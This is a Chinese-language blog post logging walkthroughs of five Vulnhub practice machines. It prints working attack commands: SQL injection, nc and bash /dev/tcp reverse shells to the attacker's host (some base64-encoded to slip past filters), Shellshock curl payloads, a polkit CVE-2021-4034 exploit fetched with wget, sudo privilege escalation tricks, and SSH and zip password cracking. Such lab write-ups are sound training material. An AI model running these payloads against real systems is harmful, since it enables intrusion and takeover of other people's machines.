Vulnhub记录

2023-11-22

字数统计: 7.4k字 | 阅读时长≈ 37分

Vulnhub记录

前言，搁置了很长很长一段时间的渗透实操，也得重新掌握起来，学习某位同学，一周三个靶机，并完整记录下来，之前DC系列已经打完

easy_cloudantivirus

信息收集

一开始发现目标ip，可以用netdiscover，arp-scan -l -I eth等等

接下来是目标ip的详细信息

1	nmap -A -sV -sC 192.168.1.8 > info.txt

可以看到，目标开启了22的ssh端口和8080（80端口做了迁移），先访问8080看看，有一个输入邀请码的界面，尝试了一下简单的sql注入，发现并无回显

扫描配置的后台文件，dirsearc又发现了一个/console的界面（需要输入pin码）

回到网页首页，我们对输入参数做一个所有可输入符号的Fuzz，枚举所有符号输入，果然有收获

可以看到，对于"的输入，其==返回异常==，返回sqlite错误，可能存在sql注入

重点关注报错语句

可以看到，当输入"时候，将前面一个闭合，可以根据该语句构造payload

" or 1 --

这个页面尝试输入文件测试，会卡住很长时间（直接给我干崩，重启大法好）所以第二次从小文件量的hello测试，发现返回/output输出结果，形式很像linux命令行的结果，推测其可能直接作为命令进行执行

使用hello | ls进行测试，发现果然是这样

既然命令执行，那可以直接弹shell啊，直接hello | nc 192.168.1.10 520 -e /bin/bash

但是实际发现并无结果，，，查看资料发现，可能是靶机的nc版本太老了，不支持-e参数，这里学到了一个骚操作，nc串联弹shell

直接发送命令hello | nc 192.168.1.10 521 | /bin/bash | nc 192.168.1.10 520

可以看到此时有结果了，之前发现服务器上安装有py，所以改成交互式shell，==（麻了，520端口似乎被占用无法用于回弹，换一个，521和1111，我说咋一直没回显）==

现在回弹shell成功，接下来就是查询用户以及密码，直接cat /etc/passwd

可以注意到有两个用户，cloudav和scanner（使用whoami可以发现我们用户是scanner），那只剩下ssh爆破？

再回过头来查询database.sql的内容（kali安装了sqlite3，绝了）

sqlite3
.open database.sql
.database
.dump

即可查询所有内容，所以之前的密码是password？

用这几个密码，连接ssh试试，看看能不能出用户，rshell太受限制了，试了爆破，不行。。。

1	hydra -L user.txt -P pwd.txt 192.168.1.8 ssh

人麻了，试试本地提权吧，find查找具有SUID权限的文件

1	find / -perm -u=s -type f 2>/dev/null

结果如下

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudo
/home/scanner/update_cloudav
/snap/core/5662/bin/mount
/snap/core/5662/bin/ping
/snap/core/5662/bin/ping6
/snap/core/5662/bin/su
/snap/core/5662/bin/umount
/snap/core/5662/usr/bin/chfn
/snap/core/5662/usr/bin/chsh
/snap/core/5662/usr/bin/gpasswd
/snap/core/5662/usr/bin/newgrp
/snap/core/5662/usr/bin/passwd
/snap/core/5662/usr/bin/sudo
/snap/core/5662/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/5662/usr/lib/openssh/ssh-keysign
/snap/core/5662/usr/lib/snapd/snap-confine
/snap/core/5662/usr/sbin/pppd
/snap/core/4917/bin/mount
/snap/core/4917/bin/ping
/snap/core/4917/bin/ping6
/snap/core/4917/bin/su
/snap/core/4917/bin/umount
/snap/core/4917/usr/bin/chfn
/snap/core/4917/usr/bin/chsh
/snap/core/4917/usr/bin/gpasswd
/snap/core/4917/usr/bin/newgrp
/snap/core/4917/usr/bin/passwd
/snap/core/4917/usr/bin/sudo
/snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/4917/usr/lib/openssh/ssh-keysign
/snap/core/4917/usr/lib/snapd/snap-confine
/snap/core/4917/usr/sbin/pppd
/bin/mount
/bin/ntfs-3g
/bin/su
/bin/ping
/bin/fusermount
/bin/umount

我们一眼发现一个不一样的东西==/home/scanner/update_cloudav==，这是一个二进制文件，直接被赋予了SUID的权限，之前也打过像这种直接弹shell的话就可以得到root用户权限的shell，但是二进制文件无法修改了，所幸给了源码，我们进行查看

直接，将我们的输入作为root用户的命令执行？那这不直接弹个shell

1	./update_cloudav "1 \| nc 192.168.1.10 4444 \| /bin/bash \| nc 192.168.1.10 5555"

OK，结束，root权限

The planets: Earth

信息收集老套路了，netdiscover加nmap

nmap扫描结果

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 16:40 HKT
Nmap scan report for earth (192.168.1.6)
Host is up (0.00026s latency).
Not shown: 987 filtered tcp ports (no-response), 10 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:C4:35:2F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.4
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms earth (192.168.1.6)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

从上面可以看出，端口开了dns解析，我们修改/etc/hosts文件，添加192.168.1.6 earth.local和192.168.1.6 terratest.earth.local的解析，再进行访问即可，80端口页面有提交窗口，还有奇怪的previous messages

测试发现，提交一次就会添加一个解析数字

1&1-->00
2&1-->03
11&11-->0000
10&11-->0001
123456789&123-->00000005060a0a

dirsearch扫描后台发现admin登录页面

接下来是443端口，访问https://terratest.earth.local/，莫得信息，后台页面扫描

访问robots.txt，一串配置信息

最后一行明显是有信息的，但是不知道具体格式，fuzz一下测出来发现是/testingnotes.txt

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
测试安全信息传递系统的注意事项。
*使用XOR加密作为算法，应该是安全的，因为在RSA中使用。
*Earth已经确认他们收到了我们发送的信息。
*testdata.txt是用来测试加密的。
*terra被用作管理门户的用户名。
Todo:
*我们如何安全地将我们的月度密钥发送给地球？或者我们应该每周更换密钥？
*需要测试不同的密钥长度以防止暴力攻击。密钥应该有多长？
*需要改进信息传递界面和管理面板的界面，它目前非常基本。

testdata.txt中的信息是

1
2

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
根据放射性测定法的估计和其他证据，地球形成于45亿年前。在地球历史的头十亿年内，生命出现在海洋中，并开始影响地球的大气和表面，导致厌氧生物和后来的好氧生物的扩散。一些地质证据表明，生命可能早在41亿年前就已经出现了。

我们来分析一下，去了解了一下XOR加密

XOR加密有一个重要的性质
$$
aXORbXORa=a
$$
因为该运算建立在阿贝尔群上，所以满足交换，我们根据信息已知，testdata.txt经过了一次XOR 加密，有三个previous messages，所以我们只需要将正确的previous messages再次与testdata.txt异或运算即可得到对应的key

下面是经过大量尝试得到的其对应加密加密思路，都是使用UTF-8直接进行的XOR运算，结果呈16进制，所以首先将previous messages从16进制转为对应的ascii编码，再与testdata.txt原文进行XOR

可以得到一个周期性的重复字符串earthclimatechangebad4humans，即为key，对应的解密前两条信息，均为乱码。

直接登录之前的/admin/login页面，terra&earthclimatechangebad4humans

又是一个命令执行的界面，测试了一下ls有显示，直接nc弹shell

发现会显示，远程连接被禁止，推测会有过滤，检测了nc等相关字符，使用base64加密进行过滤

echo bmMgMTkyLjE2OC4xLjEwIDU1NTUgLWUgL2Jpbi9iYXNoCg== | base64 -d | bash

但是kali上又是没有回弹信息，，，推测又是-e参数没有？

嘶，nc串联弹shell只能连接一下，不能持久，，，这里换一种弹shell的方式

1	bash -i &>/dev/tcp/192.168.1.10/5555 >&1

对上述base64加密echo "bash -i &>/dev/tcp/192.168.1.10/5555 >&1" | base64

然后靶机上输入即可弹shell

还有一种骚气姿势==bash -i >& /dev/tcp/0xc0.0xa8.0x0b.0x81/1234 0>&1==十六进制绕过，那么理论上也能10进制绕过弹shell

1	echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMS4xMC81NTU1IDwmMQo= \| base64 -d \| bash

解释一下命令，并补充一些弹shell姿势

#bash -i 打开一个交互式的bash
#>& 将标准错误输出重定向到标准输出
#/dev/tcp/your ip/port 意为调用socket,建立socket连接,其中your ip为要反弹到的主机ip，port为端口
#0>&1 标准输入重定向到标准输出，实现你与反弹出来的shell的交互

接下来查看用户，cat /etc/passed，可以看到earth用户式root权限

那就查看suid权限想办法提权，find / -perm -u=s -type f 2>/dev/null

/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

这里想用CVE-2021-4034进行提权==(靶机上unzip，gcc，和polkit都有)==，但是不知道为什么nc传文件总是失败

用find指令很容易找出第一个flag，find -name "*flag.txt"

在kali对应文件夹中，用py开一个http服务，在对应文件夹中

1	python3 -m http.server 80

然后靶机上用wget直接下载到上面存第一个flag的地方

1	wget http://192.168.1.10/CVE-2021-4034-main.zip

直接

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034
make
./cve-2021-4034
python -c "import pty;pty.spawn('/bin/bash')"

OK结束了

Tiki

前两个简单的做的有点不是很合适，Tiki看简介是OSCP靶机难度，试试

仍然是信息收集一套流程，netdiscover发现目标靶机ip：192.168.1.12，nmap嗅探相关信息和开放端口

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-16 18:14 HKT
Nmap scan report for ubuntu (192.168.1.12)
Host is up (0.00021s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
|   256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
|_  256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/tiki/
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:DB:FE:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-01-16T10:14:32
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms ubuntu (192.168.1.12)

Ubuntu系统，开了22，80，139，445等等端口，开启了smb服务。80端口网页是apache默认页面

dirsearch扫描后台，结果有一个很神奇，/tiki/doc/stable.version是怎么扫出来的，字典这也有？

robots.txt中配置结果如下

User-Agent: *
Disallow:
Disallow: /tiki/

OK，是个界面，Tiki wiki CMS，而/tiki/doc/stable.version里是一些数字

1.9.10.1
1.9.11
2.0
2.1
2.2
2.3
2.4
……
18.3
18.4
19.0
19.1
19.2
20.0
20.1

直接搜索该CMS的漏洞，发现当对应版本<21.2时候，存在Tiki Wiki CMS Groupware 认证绕过漏洞（CVE-2020-15906）==我怀疑msf是不是砍掉了好多CVE，，，search莫得这个，最近的只有17年的cve==

试了一下组合的CVE，不太彳亍嗷，这里就不放脚本了，然后我们根据github的链接一步步复现，其实很简单，就是多次爆破，然后回修改数据库中admin账号的密码，50次左右时候，将admin的密码删去提交表单即可成功以admin登录。

进来后，找到一个文件上传的点，测试了一下，不行，，，，，先赶紧把admin的密码改了，修改为********作为后续使用

继续收集信息，在wiki的list page中，有个用户silly的homepage和一个奇怪的页面

U1S1，这作者蛮皮的I got a new CVE Number: But I constantly forget its ID :/

另一个叫Credential的页面有信息，这格式太像账号密码了，直接ssh连接试试

ssh -p 22 silky@192.168.1.13可以，直接连接上了woc

列出账号信息

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
silky:x:1000:1000:Silky,,,:/home/silky:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:126:133:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin

老方法查看SUID权限

/snap/snapd/17950/usr/lib/snapd/snap-confine
/snap/core20/1778/usr/bin/chfn
/snap/core20/1778/usr/bin/chsh
/snap/core20/1778/usr/bin/gpasswd
/snap/core20/1778/usr/bin/mount
/snap/core20/1778/usr/bin/newgrp
/snap/core20/1778/usr/bin/passwd
/snap/core20/1778/usr/bin/su
/snap/core20/1778/usr/bin/sudo
/snap/core20/1778/usr/bin/umount
/snap/core20/1778/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1778/usr/lib/openssh/ssh-keysign
/snap/core18/1880/bin/mount
/snap/core18/1880/bin/ping
/snap/core18/1880/bin/su
/snap/core18/1880/bin/umount
/snap/core18/1880/usr/bin/chfn
/snap/core18/1880/usr/bin/chsh
/snap/core18/1880/usr/bin/gpasswd
/snap/core18/1880/usr/bin/newgrp
/snap/core18/1880/usr/bin/passwd
/snap/core18/1880/usr/bin/sudo
/snap/core18/1880/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1880/usr/lib/openssh/ssh-keysign
/snap/core18/2667/bin/mount
/snap/core18/2667/bin/ping
/snap/core18/2667/bin/su
/snap/core18/2667/bin/umount
/snap/core18/2667/usr/bin/chfn
/snap/core18/2667/usr/bin/chsh
/snap/core18/2667/usr/bin/gpasswd
/snap/core18/2667/usr/bin/newgrp
/snap/core18/2667/usr/bin/passwd
/snap/core18/2667/usr/bin/sudo
/snap/core18/2667/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2667/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/vmware-user-suid-wrapper
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/sudo
/usr/sbin/pppd

草我人蒙了，，，我查看ubuntu的系统版本，sudo版本和libc版本，发现都和CVE-2021-3156对的上，，，所以直接wget传了这个CVE包想着直接提权

1
2
3

lsb_release -a
sudo --version
ldd --version

./sudo-hax-me-a-sandwich 1结果出错！我很费解，，，

妈的查了一下才发现，==silky本身就和root权限一样高！==（黑人问号脸.jpg）

youuser ALL=(ALL) ALL
%youuser ALL=(ALL) ALL
youuser ALL=(ALL) NOPASSWD: ALL
%youuser ALL=(ALL) NOPASSWD: ALL

第一行:允许用户youuser执行sudo命令(需要输入密码).
第二行:允许用户组youuser里面的用户执行sudo命令(需要输入密码).
第三行:允许用户youuser执行sudo命令,并且在执行的时候不输入密码.
第四行:允许用户组youuser里面的用户执行sudo命令,并且在执行的时候不输入密码.

总结回顾

最后回顾了一下别人的做法，发现可以收集smb服务的消息，这是一个没考虑到的点，这里我还是正常从网站渗透。可以用smbclient \\\\192.168.1.13\\Notes

hacksudo-Thor

老三样的信息收集

netdiscover发现目标ip：192.168.1.7

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-19 20:37 HKT
Nmap scan report for hacksudothor (192.168.1.7)
Host is up (0.00026s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
|   256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_  256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CC:89:6B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms hacksudothor (192.168.1.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds

开了21，22，80这仨端口，估计重心还是在web上，进行访问80端口

后台扫描，信息还是蛮多的

以此访问，下载README.md，其他页面均为网页的静态页面，其中images有所有图片的下载，是一个图床

tnnd，狗作者，晚上渗透呢妈的放个pennywise的图，服了

这图肯定有问题，md

==binwalk，steghide，stegslove都测过了，这就是个图片，，，tmd突然好气啊==

从下载的README收集信息，发现这个框架开源，直接在github上进行搜索

在其中online-banking-system/net_banking.sql中发现默认管理员账号密码

在/admin_login.php页面登录

管理后台检查了一遍，太干净了，没什么利用点感觉，一个上传新闻的位点，上传的也不能作为php代码执行

回过头查看信息，这里了解到一个古早版本的漏洞CVE-2014-6271，详情参考这篇文章

但是这里需要我首先确定一个存在的/cgi-bin/xxx.xxx的页面，fuzz一下

可以看到存在/cgi-bin/shell.sh，但是报500

按照CVE-2014-6271github地址测试一下

1	curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \http://172.16.10.106/cgi-bin/shell.sh

好家伙直接回显，那直接弹shell

1	curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc 192.168.1.10 5555 -e /bin/bash'" \http://192.168.1.7/cgi-bin/shell.sh

直接回显！

接下来两步，一：查看当前用户可以无权限执行什么文件sudo -l。二：find查找suid权限find / -perm -u=s -type f 2>/dev/null

Matching Defaults entries for www-data on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh


/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

上面列出了两种结果，我们切换thor用户执行hammer.sh

1	sudo -u thor /home/thor/./hammer.sh

从上述测试可以看出来，该程序第二个输入的参数message会被当作command执行，那我们直接输入**/bin/bash**得到Thor的shell

拿到对应的shell后，sudo -l发现还有可以无权限执行的命令

Matching Defaults entries for thor on HackSudoThor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service

从大佬文章中了解一个渗透提权超强的网站GTFObins，直接搜索对应的service，得到提权的方式

1	/usr/sbin/service ../../bin/sh

但是需要根据本环境修改

1	sudo /usr/sbin/service ../../bin/bash

总结

这里有一个点，就是/cgi-bin/目录扫描，很依赖一些字典，主要是确定存在的文件名

其次是，当扫描发现了shell.sh存在，如何确定其是否存在什么样的漏洞

1	nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.1.7

通过nmap的脚本扫描可以得到对应的反馈，破壳漏洞

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-20 00:59 HKT
Nmap scan report for hacksudothor (192.168.1.7)
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     Exploit results:
|       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at 
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.38 (Debian) Server at hacksudothor Port 80</address>
|   </body></html>
|   
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
MAC Address: 08:00:27:CC:89:6B (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds

这里参考别人文章中推荐的扫描工具

1
2
3

gobuster dir -u http://172.16.10.106/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

gobuster dir -u http://172.16.10.106/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x py,sh,php -s 200,204,301,302,307,401,403,500

Viking-1

信息收集

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 21:12 HKT
Nmap scan report for ubuntu (192.168.1.8)
Host is up (0.00038s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
|   256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:12:57:B3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms ubuntu (192.168.1.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds

这里偷跑了，使用正常的dirsearch扫描，使用的默认字典似乎无法扫描出结果，看了一下wp，似乎使用seclist/Web-common/common.txt才可以扫描出结果

1	gobuster dir -r -u http://192.168.1.8/site/ -w /usr/share/wordlists/Web-Content/common.txt -x txt,php,html

访问对应的页面，得到一句话/war-is-over，访问该页面，得到一串很长的base64编码的数据（太长了，太占地方）

直接用curl访问得到内容

1	curl http://192.168.1.8/site/war-is-over/ \| base64 -d > war-is-over

很显然这是一个zip的压缩包==（woc这里大佬用CyberChef计算文件的熵约为8判断为压缩包的）==

压缩包有密码，，，需要破解，避坑john的一个使用

1
2
3

zip2john war-is-over.zip > pwd.txt #提权密码信息
rm -rf /root/.john/john.rec        #删掉该文件才可以开启多线程john爆破
john pwd.txt --wordlist=/usr/share/wordlists/rockyou.txt

